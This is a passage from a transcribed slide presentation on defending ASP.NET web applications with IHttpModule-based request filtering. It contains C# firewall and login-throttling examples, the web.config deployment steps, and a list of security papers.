                byte[] contentBytes = new byte[streamLength];
                app.Request.InputStream.Read(contentBytes, 0, (int)streamLength);
                postreq = System.Text.Encoding.UTF8.GetString(contentBytes);
                // Rewind so the page handler can still read the body.
                app.Request.InputStream.Position = 0;
            }
    106. Processing POST
        • Processing the POST request bytes.

            for (int k = 0; k < post.Length; k++)
            {
                string[] p = setPattern(postreq, post[k], 0);
                if (p.Length > 0)
                {
                    app.Response.Write("Security Error");
                    app.Response.End();
                }
            }
        } // end of ProcessRequest (started on slide 103)
    107. Deploying web application firewall
        • Put the dll in the /bin folder.
        • Add the following lines to your web.config file.
        • The web application firewall gets loaded.

        <httpModules>
            <add type="firewall.WebAppWall, WebAppMod" name="WebAppWall" />
        </httpModules>
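Pulling slides 99 through 107 together, here is an added example (not the presentation's own code) of one IHttpModule that compiles the rule file once at load, URL-decodes the query string and body before matching, caps the inspected body size and answers with a 403. The rule file location, the body cap and the 403 response are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Text.RegularExpressions;
using System.Web;

public class WebAppWall : IHttpModule
{
    private const int MaxBodyBytes = 1024 * 1024;      // assumed cap on inspected bodies
    private static List<Regex> queryRules, postRules; // compiled once at module load

    public void Init(HttpApplication app)
    {
        // Assumed rule file: one <QUERY>..</QUERY> or <POST>..</POST> entry per line.
        string ini = File.ReadAllText(app.Server.MapPath("~/firewallrules/config.ini"));
        queryRules = LoadRules(ini, "QUERY");
        postRules = LoadRules(ini, "POST");
        app.BeginRequest += OnBeginRequest;
    }
    // Extracts every <TAG>pattern</TAG> entry and compiles it case-insensitively.
    private static List<Regex> LoadRules(string ini, string tag)
    {
        var rules = new List<Regex>();
        foreach (Match m in Regex.Matches(ini, "<" + tag + ">(.*?)</" + tag + ">"))
            rules.Add(new Regex(m.Groups[1].Value, RegexOptions.IgnoreCase | RegexOptions.Compiled));
        return rules;
    }
    private void OnBeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = (HttpApplication)sender;
        // Match the decoded text so "%27" and "'" are caught by the same rule.
        string query = HttpUtility.UrlDecode(app.Request.Url.Query);
        if (queryRules.Exists(r => r.IsMatch(query))) Block(app);
        if (app.Request.HttpMethod != "POST") return;
        Stream s = app.Request.InputStream;
        if (s.Length > MaxBodyBytes) Block(app);     // reject, do not skip, oversized bodies
        byte[] buf = new byte[s.Length];
        int n = s.Read(buf, 0, buf.Length);
        s.Position = 0;                              // leave the body readable for the page
        string body = HttpUtility.UrlDecode(app.Request.ContentEncoding.GetString(buf, 0, n));
        if (postRules.Exists(r => r.IsMatch(body))) Block(app);
    }
    // Generic 403; neither the matched rule nor the input is echoed to the client.
    private static void Block(HttpApplication app)
    {
        app.Response.StatusCode = 403;
        app.Response.Write("Security Error");
        app.Response.End();
    }
    public void Dispose() { }
}
```

Registered in web.config exactly as on slide 107 (with the type name adjusted to this class), the module runs before any page handler; Response.End() aborts the pipeline, so a blocked request never reaches the application.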
    108. Impact of web application wall (slide shows Before and After screenshots)
    109. Defense strategies
        • All security attributes can be guarded by the firewall.
        • We can log or provide IDS using the same module.
        • Some of the deployment parameters can be implemented using this method.
        • An IHttpHandler can be developed in a similar way.
    110. Session management
        • The Session object can be used in the HTTP pipeline and the session can be strengthened.
        • Session hijacking is a common issue and a critical security problem.
        • An IHttpHandler or Module can be used to provide a solid defense against it.
    111. Application Bruteforcing
        • The application has forms through which the username and password are sent using POST.
        • Application bruteforcing is a common attack type.
        • An HttpModule can capture these attacks, and on a count basis the attack can be blocked.
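An added example (not from the presentation) of the count-based defence this slide describes: an IHttpModule that counts login POSTs per source address and account in the ASP.NET cache and refuses further attempts once a threshold is crossed within a time window. The login path, form field name, threshold and window are assumptions, and it counts submissions rather than only failures.

```csharp
using System;
using System.Web;
using System.Web.Caching;

public class LoginThrottleModule : IHttpModule
{
    private const string LoginPath = "/login.aspx";   // assumed login form
    private const int MaxAttempts = 5;                // assumed threshold per window
    private static readonly TimeSpan Window = TimeSpan.FromMinutes(10);
    private sealed class Counter { public int Count; }

    public void Init(HttpApplication app) { app.BeginRequest += OnBeginRequest; }

    private void OnBeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = (HttpApplication)sender;
        HttpRequest req = app.Request;
        if (req.HttpMethod != "POST" ||
            !string.Equals(req.Path, LoginPath, StringComparison.OrdinalIgnoreCase))
            return;
        // Key on source address plus submitted account (assumed field "username"): one
        // source cannot spray many accounts and one account cannot be hammered from one source.
        // Behind a reverse proxy, UserHostAddress must be replaced by the forwarded client address.
        string user = (req.Form["username"] ?? "").ToLowerInvariant();
        string key = "login:" + req.UserHostAddress + ":" + user;
        if (Bump(key) > MaxAttempts)
        {
            app.Response.StatusCode = 429;
            app.Response.StatusDescription = "Too Many Requests";
            app.Response.Write("Too many login attempts; try again later.");
            app.Response.End();
        }
    }
    // Counts POSTs per key in the ASP.NET cache. The entry expires Window after the
    // first attempt, so the lockout is bounded and clears itself.
    private static int Bump(string key)
    {
        Cache cache = HttpRuntime.Cache;
        lock (cache)
        {
            Counter c = cache[key] as Counter;
            if (c == null)
            {
                c = new Counter();
                cache.Insert(key, c, null, DateTime.Now.Add(Window), Cache.NoSlidingExpiration);
            }
            return ++c.Count;
        }
    }
    public void Dispose() { }
}
```

The cache is per worker process, so on a web garden or farm the counter must live in shared storage for the threshold to hold across processes.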
    112. Automated attacks
        • Automated web application attack tools are out there.
        • They crawl the site and then launch attacks.
        • This can be avoided by setting "honey traps" using an HttpModule.
        • Once trapped, the attacker can be put into an infinite loop using a defense trick.
    113. Browser catching
        • Detecting the browser using an HttpModule.
        • Making sure the request is coming from a browser by JavaScript processing and cookie handling.
        • Interesting trick.
    114. Papers
        • Assessing Web App Security with Mozilla
          http://www.oreillynet.com/pub/a/security/2005/10/20/web_vulnerabilities.html
        • Securing Web Services with mod_security
          http://www.oreillynet.com/pub/a/onlamp/2005/06/09/wss_security.html
        • Web Services – Attacks and Defense
          http://www.infosecwriters.com/texts.php?op=display&id=235
        • Web Application Footprints and Discovery
          http://www.infosecwriters.com/texts.php?op=display&id=259
        • Web application defense at the gates – Leveraging IHttpModule
          http://www.infosecwriters.com/texts.php?op=display&id=276
        • Web Services: Enumeration and Profiling
          http://www.infosecwriters.com/texts.php?op=display&id=278
        • Domain Footprinting for Web Applications and Web Services
          http://www.infosecwriters.com/texts.php?op=display&id=292
        • Browser Identification for Web Applications
          http://www.infosecwriters.com/texts.php?op=display&id=297
        • Microsoft ASP.NET Web Services & Secure coding: Unhandled exception leads to file system disclosure and SQL injection.
          http://net-square.com/advisory/NS-051805-ASPNET.pdf
    115. Thanks! shreeraj@net-square.com

    + shreerajshreeraj, 3 years ago
